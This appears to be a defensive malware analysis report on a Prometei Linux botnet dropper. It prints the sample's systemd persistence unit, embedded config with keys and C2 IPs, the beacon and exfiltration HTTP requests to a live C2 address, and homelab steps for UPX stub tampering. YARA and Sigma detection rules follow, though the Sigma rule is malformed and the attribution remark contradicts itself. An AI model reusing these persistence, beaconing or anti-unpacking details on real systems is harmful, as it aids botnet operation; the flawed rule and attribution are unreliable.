e6ce5dd2d422c2a0657d1315d12c836e17a6636e378b3c6c1ed57bf1bfebe469prometei: e6ce5dd2d422 — UPX-packed ELF64 with systemd service persistence and HTTP CGI C2
Executive Summary
Prometei Linux botnet dropper. UPX-packed ELF64, statically linked, stripped. On execution it stages a systemd unit file for boot persistence, writes a bot GUID to /etc/CommId, and beacons to a hard-coded IP via HTTP GET to /cgi-bin/p.cgi. The embedded JSON config reveals a parent ID and hostname, suggesting a hierarchical botnet structure. First Linux ELF in the corpus with observed systemd persistence.
What It Is
| Field | Value |
|---|---|
| SHA-256 | e6ce5dd2d422c2a0657d1315d12c836e17a6636e378b3c6c1ed57bf1bfebe469 |
| File type | ELF 64-bit LSB executable, x86-64, statically linked, no section header ^[file.txt] |
| Size | 436,122 bytes |
| Packer | UPX 4.24 (stub present); upx -d fails with NotPackedException likely due to post-pack tampering ^[binwalk.txt]^,^[strings.txt] |
| Compiler | GCC (Ubuntu 9.3.0) ^[strings.txt] |
| Stripped | Yes ^[rabin2-info.txt] |
| Family | Prometei (MalwareBazaar tagged Prometei / wraith) ^[mb-metadata.json] |
How It Works
Persistence — systemd unit installation
The sample drops a systemd service file to /etc/systemd/system/multi-user.target.wants/uplugplay.service during detonation. The content observed by CAPE: ^[cape-report.json]
[Unit]
Description=UPlugPlay
After=multi-user.target
[Service]
Type=forking
ExecStart=/usr/sbin/uplugplay
[Install]
WantedBy=multi-user.target
It also writes an empty stub to /sbin/uplugplay (0 bytes in sandbox, suggesting it failed to copy itself or requires elevated privileges). ^[cape-report.json]
Bot identity
A 16-byte bot GUID 8O4AUIE1TB74B3GF is written to /etc/CommId. This string is reused as the i= parameter in all HTTP C2 requests. ^[cape-report.json]
Embedded configuration
A cleartext JSON configuration block is embedded in the data section: ^[strings.txt:1381]
{"config":1,"id":"s2Ta8i16ELb3m7G0","enckey":"txfRz4/zE1Q+I0/KOnqUUTXzTpOI0AoAnnFSrVehG+IRbzw4OInJjpNWHir1P1DXbIxhl3eXH5l8skb6mJ6XNGUCA+Gb8YB5m5ufocG44ytulyyRpSHL65H+uP4IF/jTBREJBaNm18ZuHpnuRdVt81ht/thX4v5nqksi8Mm7bpA=","ParentId":"F74IRD93V5OPV46BHV","ip":"152.42.151.72","ParentHostname":"Servidor"}
The ParentId, ParentHostname (Servidor), and enckey fields indicate a peer-to-parent or multi-tier botnet topology. The ip field (152.42.151.72) does not match the sandbox C2 destination (103.176.111.176), suggesting either a fallback hierarchy or rotation mechanism.
C2 communication
Two HTTP GET requests observed outbound to 103.176.111.176:80 via /cgi-bin/p.cgi: ^[cape-report.json]
- Beacon / check-in:
GET /cgi-bin/p.cgi?r=50&i=8O4AUIE1TB74B3GF - Exfiltration:
GET /cgi-bin/p.cgi?add=<base64>&i=8O4AUIE1TB74B3GF&h=<hash>&enckey=<aeskey>
The add= query parameter contains base64-encoded data. Attempted decoding yields partially intelligible output with fragments such as info {E$RSRmxoYazIHd1gxed431vyPmDZE+ChOiAw/JWanmZMVreSKKinpOwTReeZWR01M9N7Dau7QQIy1BqShWTiXtlfEim7CYEEztSKTgiz05hSBf4k+vdugnNJY5/MQPrLhkFZ00BasqZpffL4dfgdoLMPnIr8V/fEcvVHlIRyeEKj6ILYfiiFITfYaeyNX/rYcqDwVeVL0LnYbnDfyWeWZI6NuxAbPyZ/XyEjMBo1r2p/vikGfBAT7COOs8CxyiBrWubF2a/WKzEpA0Qeh5krgtq8rksqZx9FQl0CMPu8RNWP+5rSefjQcWAOKjj1om1x1jSzHSn61KTuFRZjlKRgNk6XzRH9CvcEdmFLxnHPVmj65X2RjPWGLbL+NLTxdoqeT8d+Wf5SaV0Px5HBRSyDZvWNdk8bfqIRc3c3oB952mpuqH2RP4bGxqrSt1MsCj70FfExKMK+GU585BzpFu52Dn1cEyhIqCpVIOGKuE1A0w43k42cOrAr5Kb1U9mREuVhMtoNxUGZ7Lzjr8e5QxdFsoJk6Iu1i/ogzJL3tDvH4t/SPROYZtE0pPOoxxm/p+wqPkSd5QLnLXUABgFpPdiyVo which fails clean base64 decode, suggesting the payload is encrypted or the enckey is used for symmetric wrapping.
Hosts file modification
/etc/hosts was modified during detonation (563-byte file written). Exact delta unavailable in CAPE report; likely DNS redirection or sinkholing to prevent competing infections or security updates. ^[cape-report.json]
Decompiled Behavior
Ghidra analysis is limited due to UPX packing and full stripping: only 1 function recovered with 0 instructions in the initial auto-analysis. ^[ghidra metadata] Radare2 entrypoint (0x015de3d0) shows a short initialisation stub that calls fcn.015de668 (likely UPX decompression) followed by a second function fcn.015de445. Without unpacking the binary, meaningful pseudo-C is not obtainable. The behaviour described above is derived entirely from dynamic CAPE observation and string artefacts.
C2 Infrastructure
| IOC | Type | Notes |
|---|---|---|
103.176.111.176:80 |
C2 primary | HTTP GET /cgi-bin/p.cgi ^[cape-report.json] |
152.42.151.72 |
Config fallback / parent | Hard-coded in embedded JSON only; no sandbox traffic observed ^[strings.txt:1381] |
8O4AUIE1TB74B3GF |
Bot GUID | Written to /etc/CommId, reused in C2 i= parameter ^[cape-report.json] |
The HTTP User-Agent was empty; requests used HTTP/1.0 ^[cape-report.json].
Interesting Tidbits
- The
ParentHostnamevalue isServidor(Portuguese/Spanish for "Server"), suggesting a Portuguese-language operator environment or a default naming convention in the builder — consistent with Prometei's historically Eastern European operator attribution. ^[strings.txt:1381] - UPX header strings claim version 4.24, yet
upx -drejected the file as "not packed by UPX," indicating post-packing tampering or a non-standard UPX fork used to hinder unpacking. ^[strings.txt]^,^[binwalk.txt] - Two temp files (
/tmp/tmp.ZZdlfX1liDand/tmp/tmp.Mk6tiBLVtX) were dropped; the latter is 465 bytes of high-entropy data, likely an encrypted task file or payload block. ^[cape-report.json] - NTP traffic to
185.125.190.56:123and DNS to1.1.1.1were observed; the NTP destination is Canonical's NTP pool (Ubuntu default) and therefore not inherently malicious, but time-sync is often prerequisite for certificate validation or task scheduling.
How To Mess With It (Homelab Replication)
- Obtain a standard UPX-packed binary (e.g., compile a simple C HTTP client with
gcc -static -s, thenupxit). - Verify packing signature with
strings— should showUPX!andThis file is packed with the UPX executable packer. - Attempt
upx -dto confirm standard decompression works. - Tamper with the UPX stub (e.g., patch the magic bytes) and observe
upx -dfail — this approximates the anti-unpack trick seen here. - For a full replication of the behavioural signature: write a systemd unit to
/etc/systemd/system/multi-user.target.wants/test.service, runsystemctl daemon-reload && systemctl enable test.service, and capture the auditd / syslog events.
Deployable Signatures
YARA
rule prometei_linux_elf {
meta:
description = "Prometei Linux ELF UPX-packed botnet dropper"
author = "PacketPursuit SOC"
date = "2026-05-29"
sha256 = "e6ce5dd2d422c2a0657d1315d12c836e17a6636e378b3c6c1ed57bf1bfebe469"
strings:
$upx1 = "UPX!" ascii
$upx2 = "$Info: This file is packed with the UPX executable packer" ascii
$s1 = "\"config\"" ascii
$s2 = "\"enckey\"" ascii
$s3 = "uplugplay" ascii
$s4 = "/cgi-bin/p.cgi" ascii
$s5 = "/etc/CommId" ascii
$s6 = "[Unit]" ascii
$s7 = "multi-user.target" ascii
condition:
uint32(0) == 0x464c457f and
($upx1 or $upx2) and
3 of ($s*)
}
Sigma — systemd service drop
title: Prometei Systemd Service Drop
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
status: experimental
description: Detects creation of Prometei-related systemd service files or suspicious ExecStart paths.
logsource:
product: linux
category: file_event
detection:
selection:
TargetFilename|contains:
- 'uplugplay.service'
- '/etc/systemd/system/multi-user.target.wants/uplugplay'
- TargetFilename|endswith: '.service'
TargetFilename|contains:
- '/etc/systemd/system/'
- '/usr/lib/systemd/system/'
condition: selection
falsepositives:
- Legitimate package installation (filter by UID / package manager context)
level: high
tags:
- attack.persistence
- attack.t1543.002
IOC list
| Type | Value |
|---|---|
| SHA-256 | e6ce5dd2d422c2a0657d1315d12c836e17a6636e378b3c6c1ed57bf1bfebe469 |
| MD5 | 5a50692be4e0dcf9f59697fce073b10f |
| SHA-1 | 68e05b05f39ff26a209d30738328ed5494b8c2ed |
| C2 IP | 103.176.111.176:80 |
| Config IP | 152.42.151.72 |
| Bot GUID | 8O4AUIE1TB74B3GF |
| Dropped service | /etc/systemd/system/multi-user.target.wants/uplugplay.service |
| Dropped binary stub | /sbin/uplugplay |
| Bot ID file | /etc/CommId |
| Temp staging | /tmp/tmp.ZZdlfX1liD, /tmp/tmp.Mk6tiBLVtX |
Behavioral Fingerprint
An ELF64 Linux executable packed with UPX 4.24 (stub may be tampered to prevent standard unpacking), which drops a systemd unit file named uplugplay.service into /etc/systemd/system/multi-user.target.wants/ pointing to /usr/sbin/uplugplay, writes a 16-character bot GUID to /etc/CommId, modifies /etc/hosts, and then performs unencrypted HTTP GET requests to 103.176.111.176:80 via /cgi-bin/p.cgi using the bot GUID as the i= parameter and a base64 add= payload for exfiltration.
Detection Signatures (MITRE ATT&CK)
| Technique ID | Name | Evidence |
|---|---|---|
| T1543.002 | Create or Modify System Process: Systemd Service | Dropped uplugplay.service to multi-user.target.wants ^[cape-report.json] |
| T1071.001 | Application Layer Protocol: Web Protocols | HTTP GET beacon to 103.176.111.176/cgi-bin/p.cgi ^[cape-report.json] |
| T1041 | Exfiltration Over C2 Channel | Base64 add= parameter in second HTTP request ^[cape-report.json] |
| T1070.004 | Indicator Removal: File Deletion | Temp files created in /tmp/; /etc/hosts modified ^[cape-report.json] |
| T1057 | Process Discovery | /proc/self/exe referenced in strings ^[strings.txt] |
| T1083 | File and Directory Discovery | /etc/locp and /proc paths in strings ^[strings.txt] |
References
- MalwareBazaar sample page: https://malwarebazaar.abuse.ch/sample/e6ce5dd2d422c2a0657d1315d12c836e17a6636e378b3c6c1ed57bf1bfebe469
- CISA Alert AA21-076A (Prometei): https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-076a
- prometei — entity page
- systemd-service-persistence-linux — procedure page
Provenance
file.txt— ExifTool /file(1)outputstrings.txt—strings -n 6output (UPX strings, config JSON, filesystem paths)binwalk.txt— Binwalk surface scanrabin2-info.txt— radare2iIheader summarycape-report.json— CAPE sandbox full JSON report (network, dropped files, HTTP requests)mb-metadata.json— MalwareBazaar metadata (family tagsPrometei/wraith)dynamic-analysis.md— CAPE sandbox summary (network hosts, dropped file paths)